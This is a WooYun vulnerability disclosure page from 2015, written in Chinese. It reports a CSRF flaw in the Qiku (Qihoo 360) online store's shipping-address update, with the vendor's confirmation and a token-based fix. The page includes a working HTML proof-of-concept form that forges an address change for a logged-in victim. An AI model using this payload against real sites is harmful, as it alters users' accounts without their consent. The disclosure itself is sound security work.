当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151798

漏洞标题:奇酷商城CSRF添加收货地址

相关厂商:奇虎360

漏洞作者: 冰山

提交时间:2015-11-04 21:09

修复时间:2015-12-20 13:08

公开时间:2015-12-20 13:08

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-04: 细节已通知厂商并且等待厂商处理中
2015-11-05: 厂商已经确认,细节仅向厂商公开
2015-11-15: 细节向核心白帽子及相关领域专家公开
2015-11-25: 细节向普通白帽子公开
2015-12-05: 细节向实习白帽子公开
2015-12-20: 细节向公众公开

简要描述:

如题

详细说明:

1、

http://www.qiku.com/myec/myAddress.htm


2、

1.jpg


3、POC

<html>
  <body>
    <form action="http://www.qiku.com/address/update.htm" method="POST">
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="receiver" value="fsdf" />
      <input type="hidden" name="mobilePhone" value="13888888888" />
      <input type="hidden" name="telPhone" value="" />
      <input type="hidden" name="provinceId" value="260" />
      <input type="hidden" name="cityId" value="250" />
      <input type="hidden" name="districtId" value="273" />
      <input type="hidden" name="provinceName" value="?&#185;&#191;?&#184;&#156;?&#156;&#129;" />
      <input type="hidden" name="cityName" value="?&#189;&#174;?&#183;&#158;?&#184;&#130;" />
      <input type="hidden" name="districtName" value="?&#189;&#174;?&#174;&#137;?&#142;&#191;" />
      <input type="hidden" name="address" value="ewqewqewq" />
      <input type="hidden" name="postCode" value="100100" />
      <input type="hidden" name="fullAdress" value="?&#185;&#191;?&#184;&#156;?&#156;&#129;?&#189;&#174;?&#183;&#158;?&#184;&#130;?&#189;&#174;?&#174;&#137;?&#142;&#191;" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


4、点击POC返回

2.jpg


5、

3.jpg


漏洞证明:

修复方案:

token

版权声明:转载请注明来源 冰山@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-11-05 13:08

厂商回复:

感谢关注360产品安全,我们已经安排修复。

最新状态:

暂无